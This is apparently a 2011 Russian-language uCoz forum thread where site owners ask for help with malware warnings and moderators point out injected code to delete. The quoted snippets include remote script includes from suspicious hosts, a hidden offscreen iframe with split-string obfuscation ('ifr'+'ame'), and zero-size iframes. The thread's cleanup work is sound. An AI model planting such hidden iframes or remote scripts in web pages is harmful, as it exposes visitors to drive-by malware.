Чат сообщества
   | |
| Модератор форума: Yuri_G |
| Сообщество uCoz » Мастерская uCoz » Безопасность сайта » Вирусы на сайтах (для изучения) (примеры вредоносного кода и устранение) |
| Вирусы на сайтах (для изучения) |
|
Привет! Помогите устранить проблему! Мой сайт http://22071957milena.ucoz.ru/
Когда открываю сайт выскакивает предупреждение Внимание! Обнаружена проблема! 22071957.milena.ucoz.ru содержит материалы сайтаgoogle108hs.faqsrtv.com, который по имеющимся данным, распространяет вредоносное ПО. Ваш компьютер может подвергнуться вирусной атаке при посещении этого сайта. Google обнаружил, что на ваш компьютер могут быть установлены вредоносные программы, если вы продолжите просмотр этого сайта. Если вы посещали его в прошлом и доверяете ему, вполне возможно, что он недавно был взломан хакерами.... |
|
Cherepanova, ну почему сайты учительниц настолько изобилуют всяким мусором? это ужасно
может стоит почиститься? н7икогда не ставьте баннеры в виде информеров и удалите спам Quote <a <script type="text/javascript" src="http://vchitel.com.ua/rtr/2"></script> </a> <a href="http://webkolo.clan.su/" target="_blank"> баннер сайт проверен антивирусом не что иное как просто мусор блок Для Web майстра Quote <!-- <block5397> --> <table class="boxTable"><tr><th><!-- <bt> -->Для Web майстра<!-- </bt> --></th></tr><tr><td class="boxContent center"><!-- <bc> --><script type='text/javascript' src='http://our-soft.ru/js/wm.js'></script><!-- </bc> --></td></tr></table> <!-- </block5397> --> из блока друзья сайта удалить не задумываясь следующий код Quote <td class="boxContent center"><!-- <bc> --><a href=" http://stezhynky.ucoz.ru/ " target="_blank"><img src=" http://stezhynky.ucoz.ru/oformlenie/baner32.jpg "></a> <script src="http://valeriks.ucoz.ru/media/?t=video;w=88;h=31;f=http%3A%2F%2Fvaleriks.ucoz.ru%2Fperedzvin.swf" type="text/javascript"></script> <a href=" http://yrok.at.ua " target="_blank"> из формы входа обязательно удалить это Quote if (currentTime.getHours() >= 18 && currentTime.getHours() <= 23) document.write("Добрий вечір, "); if (currentTime.getHours() >= 0 && currentTime.getHours() <= 5) document.write("Доброї ночі, "); </SCRIPT><script src="/jquery.js"></script> Гість</strong> <br> <br> проблема ваша состоит в том, что что-то из вашего мусора генерирует вот это http://pogtv.com/includes/api/3/jquery.js значит удалите флеш баннер, лишнее жквери из формы входа и остальной шлак, что я сказала и придется проверить ещё раз |
|
1) http://klep-mir.ucoz.ru/
2) И под логином, и под гостем. Добавлено (06-Ноя-2011, 17:53:42) Quote (Kleopatra0409) 1) http://klep-mir.ucoz.ru/ 2) И под логином, и под гостем. Вирус завелся. |
|
Kleopatra0409, Мини профиль , убрать это
<script type="text/javascript" src="http://r1p.pp.ua/1.js"></script> |
|
Добрый день!
Помогите пожалуйста определить, что генерирует данную ссылку на *http://pogtv.com/includes/api/3/jquery.js* Мой сайт http://ck-sportfishing.at.ua С уважением ... Вопрос снимаю, вроде бы как сам решил ... Сообщение отредактировал Admin7948 - Понедельник, 07 Ноя 2011, 14:20:21
|
|
Dimka8413, В блоке - Жители сайта ..
<script src="http://zagruzlo.ru/swf.js" type="text/javascript"> Quote его нужно убрать, да? Quote var frame = document.createElement('ifr'+'ame'); frame.style.position = 'absolute'; frame.style.left = '-1000px'; frame.src='http://zagruzlo.ru/'; document.body.appendChild(frame); Сообщение отредактировал Miss_Esq - Понедельник, 07 Ноя 2011, 15:15:17
|
|
Здравствуйте! Помогите пожалуйста.
1. Сайт - INFORMATION 2. При загрузки сайта на IE вылазит разная реклама и мне кажется что я раскручиваю чью то рекламу проверил коды и не чего не обнаружил. Может Вы поможете. Заранее огромное спасибо. |
|
safa,
Quote <!-- Реклама от frps.homeftp.org --> база гугла http://google.com/safebrowsing/diagnostic?site=frps.homeftp.org/&hl=ru и уберите это Quote <td style="background:#eeeeee; color:#5d5d5d; padding-top:3px;"><!-- <bc> --><center><a href="http://traffbiz.ru/?ref=удалено" target="_blank"><img src="http://traffbiz.ru/partner/150x200_4.png" alt="оплата за показы" некоторые антивирусы и яндекс просто истерически реагируют на сайту ссылку от траффбиза |
|
Rromichh, ваша проблема выделена красным
Quote <div class="banners"><a href="http://infotor.net/"><img src="http://infotor.net/button.php?u=Rromichh" alt="InfoTor.Net - Каталог битторрент трекеров без регистрации и рейтинга!" border="0" /></a></div> <script type="text/javascript" src="http://uweb.su/data/files/uweb.js"></script></div> </noindex></div><!-- </bc> --> </div> </div></div> <!-- </block6> --> почитайте тему. я уже объясняла что внутри скрипта |
|
Знаю вопрос не по теме,ответьте пожалуйста: Как убрать рекламу с сайта (реклама не юкоз,та которая в левом низу сайта) Подскажите где находится код от этой рекламыпросто забыл куда прилепил! Вот ссылка http://khlunhl.ru/
решено |
|
Dimka8413, дайте скрин своей рекламы. она видна под гостем или под логином?
вы про эту рекламу Quote <script type="text/javascript" src="http://c.am11.ru/code/pop/BadVovak.js"></script> <script type="text/javascript" charset="windows-1251" src="http://c.am11.ru/code/sb/left/BadVovak.js"></script><!-- <body> --> эта реклама вставлена тем кто выполнил ваш шаблон. во всяком случае подпись автора шаблона и имя в скрипте совпадают дайте скрин чтобы не гадать |
|
Сайт citrus-site.ru
Гугл-Хром там находит вот это "Внимание! Обнаружена проблема! citrus-site.ru содержит материалы сайта unol.ru, который, по имеющимся данным, распространяет вредоносное ПО. Ваш компьютер может подвергнуться вирусной атаке при посещении этого сайта. Google обнаружил, что на ваш компьютер могут быть установлены вредоносные программы, если вы продолжите просмотр этого сайта. Если вы посещали его в прошлом или доверяете ему, вполне возможно, что он недавно был взломан хакерами. Рекомендуется прекратить просмотр и посетить сайт завтра либо перейти на другой сайт. Мы уже сообщили владельцу сайта unol.ru о том, что на его сайте найдено вредоносное ПО. Подробнее о проблемах, обнаруженных на unol.ru, можно узнать на странице Google Страница диагностики безопасного просмотра." При этом в коде нет ссылок вот на этот unol. |
|
Елка-Палка, Это явно стоит не из добрых побуждений , iframe да ещё с нулевыми размерами , явно что то тут не чисто ..
<noindex><nolollow> <iframe style="position:absolute;left:1%;width:0%;top:1%;height:0%;"src="http://juice.ucoz.ua/"></iframe> </noindex></nolollow><noindex><nolollow> А это то вам зачем ?? <iframe scrolling="no" frameborder="0" width="212" height="260" src="http://news.gnezdo.ru/show/985/block.html"></iframe> Сообщение отредактировал Miss_Esq - Пятница, 11 Ноя 2011, 11:48:31
|
|
Quote (Miss_Esq) <noindex><nolollow> <iframe style="position:absolute;left:1%;width:0%;top:1%;height:0%;"src="http://juice.ucoz.ua/"></iframe> </noindex></nolollow><noindex><nolollow> Вот я тоже на это грешила. Просто не была уверена. Спасибо. Quote (Miss_Esq) А это то вам зачем ?? <iframe scrolling="no" frameborder="0" width="212" height="260" src="http://news.gnezdo.ru/show/985/block.html"></iframe> Это хороший обменник трафиком. Это совсем не вирус. Не первый год стоит на разных сайтах. |
| |||